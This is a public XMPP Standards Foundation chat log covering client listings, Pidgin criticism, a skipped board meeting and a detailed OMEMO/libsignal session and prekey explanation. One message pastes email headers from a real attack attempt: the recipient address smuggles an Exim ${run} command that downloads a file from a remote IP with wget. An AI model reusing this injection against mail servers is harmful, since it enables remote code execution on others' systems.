XSF Discussion - 2019-06-27

  1. edhelas


  2. adityaborikar

    edhelas: thumbsup!

  3. edhelas

    related HN thread https://news.ycombinator.com/item?id=20291889#20292122

  4. edhelas

    if you guys want to reply

  5. Yagiza

    Daniel, are you here?

  6. Daniel

    Yagiza: it's probably better if you just ask your question since there are other people in here who can answer them as well

  7. Daniel

    As lovetox demonstrated yesterday

  8. Yagiza

    Daniel, ok

  9. Yagiza

    So, once session_cipher is created, I don't need session_builder anymore?

  10. rion

    Is it possible to add Psi here https://xmpp.org/getting-started/ ?

  11. rion

    ah there is a list on another page. ok.

  12. Zash

    https://xmpp.org/software/clients.html ?

  13. rion

    so the first list is discriminating all other clients :)

  14. Zash

    It would be nice if there were more detailed getting-started tutorials, with pictures and stuff. Maybe you could do one for Psi?

  15. Zash

    "get a client, get an account, done!" seems a bit bare

  16. Zash

    Let's not have another fight over this page 😕

  17. jonas’

    maybe clients should make tutorials superfluous by having proper onboarding

  18. jonas’

    with server lists and stuff

  19. jonas’

    and then we can make it a criterion for a client to have that type of flow to be listed on getting_started

  20. jonas’

    and Ge0rG can finally get rid of his pidgin

  21. Zash

    I don't see Pidgin there

  22. jonas’

    oh, so that was fixed already

  23. rion

    what's wrong with Pidgin?

  24. jonas’

    lack of support for any modern XMPP feature?

  25. jonas’

    and don’t get me started on plugins

  26. Ge0rG

    tl;dr: everything is wrong

  27. jonas’

    you know, pidgin, the type of client where you have to ask "did you write anything?" when the peer goes off- and online, because it doesn’t have stream management *or* MAM

  28. jonas’

    you know, pidgin, the type of client where you need to make other clients resource-lock to, otherwise you don’t get messages (no carbons)

  29. jonas’

    you know, pidgin, the type of client where you have to consciously log off before switching networks/suspending to not lose messages (again, no SM or MAM)

  30. jonas’

    you know, pidgin, the type of client which has an architecture which makes it easy for crypto plugins to accidentally send plaintext instead of ciphertext when you start a message with "/me"

  31. jonas’

    (I’m stopping now)

  32. pep. deserves its own rant anyway

  33. pep.


  34. jonas’


  35. pep.

    Why poezio.. why..

  36. pep.

    "//me" doesn't even work

  37. jonas’

    it can’t

  38. jonas’

    and you know why :)

  39. jonas’

    that’s why you want to rant about it

  40. jonas’

    you need ///me

  41. pep.


  42. jonas’

    and then everyone will see "//me" :)

  43. pep.

    jonas’, while I have you, can you merge this plz https://github.com/xsf/xmpp.org/pull/582 :)

  44. rion

    Well I always used Pidgin just like a transport for spectrum =)

  45. pep.

    I think there are also horror stories with that

  46. jonas’

    pep., I don’t have github credentials at work

  47. jonas’

    oh, spectrum with libpurple? you know, the IRC transport where you would get disconnected when you sent a message starting with ``/quit`` to the transport?

  48. jonas’

    or was it the transport where you would get disconnected when you sent a multi-line message like: foo QUIT :bar

  49. jonas’

    to get disconnected?

  50. jonas’

    I *am* in a ranty mood today.

  51. rion

    unfortunately Pidgin's Skype integration is full of bugs. That's what I needed at most last time.

  52. neshtaxmpp

    moparisbest: someone comment or number ip is not important and this is LIE. today my friend comment someone connect from and send this: Return-Path: <root@1ur.com> X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Received: from localhost (localhost []) by yourdomain.com (Postfix) with ESMTP id A94DBA00B30 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.con>; Wed, 26 Jun 2019 02:58:45 +0200 (CEST) X-Quarantine-ID: <UdVj8nzxJJRS> X-Virus-Scanned: Debian amavisd-new at yourdomain.com X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date" Message-Id: <20190626005845.A94DBA00B30@yourdomain.com> Date: Wed, 26 Jun 2019 02:58:45 +0200 (CEST) From: root@1ur.com

  53. jonas’

    neshtaxmpp, this room is not about email.

  54. neshtaxmpp

    jonas’: it is about sslh and someone try hack my friend server through sslh. i need someone comment how sslh sopve apache2 to show real ip and block not to be used outside internet.

  55. jonas’

    this room also is not about sslh

  56. jonas’

    or sysadmin in general

  57. vanitasvitae

    neshtaxmpp, tell your friend to visit a local hackerspace to get help, but please do not bother the people in this room about it.

  58. pep.

    vanitasvitae, I wish hackerspaces were as big a thing anywhere else as they are in Germany, but it's not the case :(

  59. Daniel

    I'm not entirely sure hackerspaces want to be a replacement for search engines

  60. Zash

    Maybe there's even a support venue for sslh itself.

  61. Seve is on its way to the airport. Crossing fingers for a stable connection

  62. Guus

    Ralph and Matt can't make it.

  63. Guus

    if you're not on a reliable connection, we might as well skip the meeting, unless something important needs to be handled.

  64. Guus

    (assuming that nyco is here, in the first place)

  65. Seve


  66. nyco

    good guess

  67. Guus

    do we skip this meeting or not?

  68. nyco

    let me check the board

  69. nyco

    followup on badges is ok, I've not done the poll yet

  70. nyco

    so yes, I think we need more members to really advance

  71. Seve

    I guessed that, yes

  72. Guus

    ok, let's skip this meeting then.

  73. nyco

    three is good from a bylaws standpoint, but imho not enough for debate and decision making

  74. Guus


  75. nyco


  76. nyco

    so, bang, and bang, done, thx all, +1W ;-)

  77. Guus

    have a good flight, Seve 🙂

  78. nyco

    I believe I can flyyyyy

  79. Seve


  80. Guus

    If your pilot sings that: run.

  81. Seve

    Oh... Haha

  82. Seve

    If I hear that, it may be too late

  83. Ge0rG

    Aw, what a pity. I wanted to provide an update regarding the German government contact.

  84. Guus

    Ge0rG - could you do that by mail, if it's longer than 2 sentences?

  85. Guus

    Do you need our input to progress?

  86. Ge0rG

    Guus: yes I can. No input needed so far. Should I write to members@?

  87. Guus

    if it's of interest to the members, yes. Otherwise: did we solve that Board mailing thingy?

  88. Guus


  89. Yagiza


  90. Yagiza

    Where can I get session_cipher to decrypt pre_key_signal_message?

  91. Ge0rG

    Guus: IIRC somebody is now looking for external mail to board@ or somesuch

  92. jonas’

    Ge0rG, Seve typically does that

  93. Guus

    (Who's now in a plane)

  94. Guus

    Ge0rG if you're unsure if it's suitable for members@, mail it to me, and I'll forward it to board@

  95. Ge0rG

    Guus: I'll try to write down something when I have a bit of time. Don't think there are any issues with using members@

  96. Guus


  97. lovetox

    Yagiza, yes, the session is only built once; after that you load the session from the database and use it to decrypt and encrypt

  98. Yagiza

    lovetox, so, I have different question.

  99. Yagiza

    lovetox, how to generate session_cipher to decrypt pre_key_signal_message?

  100. Yagiza

    Do I have to decrypt it with a key generated with an empty session_builder (before the session_builder_process_pre_key_bundle() call)?

  101. lovetox

    hm i cant talk much about the C lib, but in the python port

  102. lovetox

    you create a new session_cipher

  103. lovetox

    then use session_cipher.decryptPkmsg(pre_key_message)

  104. lovetox

    and decryptPkmsg does create a new session on its own and saves it to the database

  105. lovetox

    so nothing more to do here

  106. lovetox

    is there something similar in the C version?

  107. lovetox

    there's session_cipher_decrypt_pre_key_signal_message

  108. lovetox

    looked it up

  109. lovetox

    it does everything for you

  110. lovetox

    create a new session, store it to the db, decrypt the message

  111. Yagiza

    lovetox, so, after that call, current session is invalidated and new session is created instead?

  112. lovetox


  113. lovetox

    thats also how you refresh a session, you just send a new pkmsg

  114. lovetox

    but normally this should not be necessary

  115. Yagiza

    lovetox, do I need to generate new session_cipher after that?

  116. lovetox

    session_cipher is only a wrapper

  117. lovetox

    it does not hold any state itself

  118. lovetox

    you call decrypt or encrypt on it; what it does is load the session from the database every time

  119. lovetox

    you can also recreate it after each message if you want

  120. Yagiza

    lovetox, so, once session is changed, existing session_cipher will use a new session data?

  121. lovetox


  122. lovetox

    i create it on the first message for each contact

  123. lovetox

    and cache it

  124. lovetox

    but you dont have to, you can also create it anew on every message, does not make a difference

  125. Yagiza

    lovetox, IC

  126. lovetox

    session is loaded on each message, modified and stored back to database

  127. lovetox

    otherwise it would be highly likely that you have an invalid session if your application crashes

  128. lovetox

    so no state is held in memory

  129. Yagiza

    lovetox, ok

  130. Yagiza

    lovetox, so, I need session_builder only when initiating a session. If the session is initiated by the other party, it is created by session_cipher_decrypt_pre_key_signal_message(), right?

  131. lovetox


  132. Yagiza

    lovetox, IC. Thank you.

  133. Yagiza

    lovetox, and the last question.

  134. Yagiza

    lovetox, how do I decide to which resources of my contact I need to send encrypted messages, and to which of them unencrypted ones? Only by checking if it has the 'eu.siacs.conversations.axolotl.devicelist+notify' #disco feature?

  135. lovetox


  136. lovetox

    you dont send messages to resources

  137. lovetox

    or better said all messages you send will arrive at all resources of the contact

  138. lovetox

    because of carbons, mam etc

  139. Yagiza

    lovetox, I can't be sure that all resources of my contact support OMEMO.

  140. lovetox

    you dont change anything about how you send a message

  141. lovetox

    Yagiza, you can be sure that one device supports it

  142. lovetox

    and thats enough

  143. lovetox

    the user decides if he wants to send encrypted or not

  144. lovetox

    not the client

  145. Yagiza

    lovetox, what do you mean? I have a contact. And I see all of their resources. And I can choose to which of them to send a message.

  146. Yagiza

    lovetox, at least, my client allows that.

  147. lovetox

    so your client makes the server not save the message in MAM

  148. lovetox


  149. lovetox

    otherwise you cant control who downloads a message from the archive

  150. Yagiza

    lovetox, my client does not support MAM yet.

  151. lovetox

    but the server does

  152. Yagiza

    lovetox, so?

  153. lovetox

    and the server stores all messages in MAM

  154. lovetox

    whether you want it or not

  155. Yagiza

    lovetox, ok

  156. lovetox

    and other clients will download it

  157. lovetox

    dont assume you can control who gets the message

  158. lovetox

    other than the barejid

  159. lovetox

    you find keys in pep

  160. lovetox

    then you know at least one device of the contact supports it

  161. lovetox

    and afterwards you give your user the decision if he wants to talk encrypted or not

  162. Yagiza

    lovetox, anyway. When I send an encrypted message, clients which do not support OMEMO will just ignore it. When I send an unencrypted message, all the clients may read and display it.

  163. lovetox


  164. Yagiza

    And I can't be sure that my or their server supports MAM.

  165. lovetox

    and you cant know if the user is fine with that

  166. lovetox

    the user may be totally fine with one of his devices ignoring omemo

  167. lovetox

    and only one device being able to decrypt

  168. Yagiza


  169. lovetox

    i just try to save you implementation trouble, you can try to make logic that starts and stops encrypting if this and that happens

  170. lovetox

    but i tell you from experience users will come and tell you they want to make the decision themselves

  171. lovetox

    especially disco info is useless here

  172. Yagiza

    So, if the user enabled OMEMO encryption for a contact, but selected a resource which does not support it, I must somehow make him aware of the fact and send unencrypted messages in that case.

  173. lovetox

    it only works if a client is online

  174. lovetox

    omemo works also if the contact is offline

  175. lovetox

    dont forget that

  176. Yagiza

    lovetox, yes. That's not a problem.

  177. lovetox

    Yagiza, why do you even have UI where the user selects a resource

  178. Yagiza

    lovetox, I'm talking only about the case above.

  179. Yagiza

    lovetox, because that's a good tradition.

  180. lovetox

    if i talk as a user, i dont care how many devices of my friend are online, i just want to send him a message

  181. Yagiza

    lovetox, not all the servers support MAM or Message Archiving or Message Carbons.

  182. lovetox

    Yagiza, then we should tell the admins to upgrade

  183. Yagiza

    So, it's a good thing to have an ability to specify a resource.

  184. lovetox

    i cant help you with that, thats not a usecase for me, to write clients for servers from the stone age

  185. Yagiza

    lovetox, IC. So, you think sending messages to the bare JID is a good idea?

  186. lovetox

    Yagiza, thats not what i wanted to say, although many devs in the community would answer that question with yes

  187. lovetox

    what i want to say is that i think its bad UI if you force the user to pick a resource

  188. lovetox

    because the user has to know what a resource is, that is xmpp protocol stuff

  189. lovetox

    users just want to write messages

  190. lovetox

    and you should not assume, only because you address a message to a resource, that only this resource will get the message

  191. Yagiza

    lovetox, yes, of course.

  192. lovetox

    that is a 99% wrong assumption in our current world

  193. jonas’

    send to the bare JID

  194. jonas’

    you’ll be in pain when IM-NG lands otherwise :)

  195. pep.

    When is that :/

  196. pep.

    Any client/server already doing things with it? More than what MattJ said at the summit

  197. jonas’

    I think there was some discussion about that type of stuff the other day

  198. jonas’

    but don’t pin me down on that

  199. jonas’

    I wish I had time to experiment with things, but so many fires to fight these weeks

  200. pep.

    People in IT always playing with fire..

  201. jonas’


  202. pep.

    Though with the current temperature..

  203. pep.


  204. jonas’

    holy smokes

  205. jonas’

    I feel sorry for you

  206. jonas’

    and I thought we had bad luck with the 38°C yesterday

  207. jonas’

    (dropped to 25°C today)

  208. lovetox

    i dont find the xep that defines dataforms for disco info

  209. lovetox

    ah 128

  210. Yagiza

    And one more question...

  211. Yagiza

    After I processed a PreKeySignalMessage, is the appropriate pre key automatically substituted with a new one? So, I only need to refresh the bundle on the PEP server?

  212. lovetox


  213. lovetox

    the prekey which was used is deleted from the database

  214. lovetox

    but no new keys are generated

  215. lovetox

    you have to do this yourself

  216. lovetox

    and of course you should instantly delete the prekey used from pep

  217. Yagiza

    lovetox, so, I need to generate a new key instead of the used one? Ok.

  218. lovetox

    you dont have to generate new ones, i mean we publish 100 keys

  219. lovetox

    you can also generate new ones when you reach 90 or something like this

  220. lovetox

    but you have to delete the used one from pep, so you have to push 99 keys anyway

  221. lovetox

    so i would say just generate one and push 100 again

  222. Yagiza

    lovetox, I'm aware of publishing a new bundle of 100 keys.

  223. Yagiza

    lovetox, the only question was about generating a new key instead of the used one.

  224. lovetox

    im not following, if a key is used, you only have 99, if you're aware that you should have 100 keys

  225. lovetox

    what is there for other option than generate 1 new key?

  226. Yagiza

    lovetox, I didn't know whether the old key is deleted and a new one is generated automatically, or not. So, once you told me that it is deleted, but no new key is generated, I understand that I only need to generate a new key to replace the used one.

  227. lovetox

    ah ok :)

  228. lovetox

    and Yagiza, we should move the discussion to xmpp:jdev@conference.jabber.org?join, this room is more suited

  229. Yagiza

    lovetox, yes. I tried to ask there, but almost no one replied.

  230. lovetox

    im always joined there :)

  231. Yagiza

    lovetox, me too.

  232. vanitasvitae

    Yagiza: you could take a look at https://blog.jabberhead.tk/2019/04/15/closer-look-at-the-double-ratchet/ to understand the inner workings of the signal protocol.

  233. Yagiza

    vanitasvitae, ok, thank you!

  234. lovetox

    can someone verify that the example here is wrong https://xmpp.org/extensions/xep-0128.html#examples

  235. lovetox

    as it has a field without type which means text-single

  236. lovetox

    but still has multiple <values>

  237. lovetox

    which is a MUST NOT in 0004

  238. lovetox

    or am i missing something

  239. moparisthebest

    jonas’, vanitasvitae: I've tried more than once to help neshtaxmpp by linking him to exactly what he was asking for etc; he's either a troll or beyond help, I just ignore him now

  240. pep.

    moparisthebest, yeah I have also given in this domain :)

  241. vanitasvitae

    Yeah I also dealt with him repeatedly :D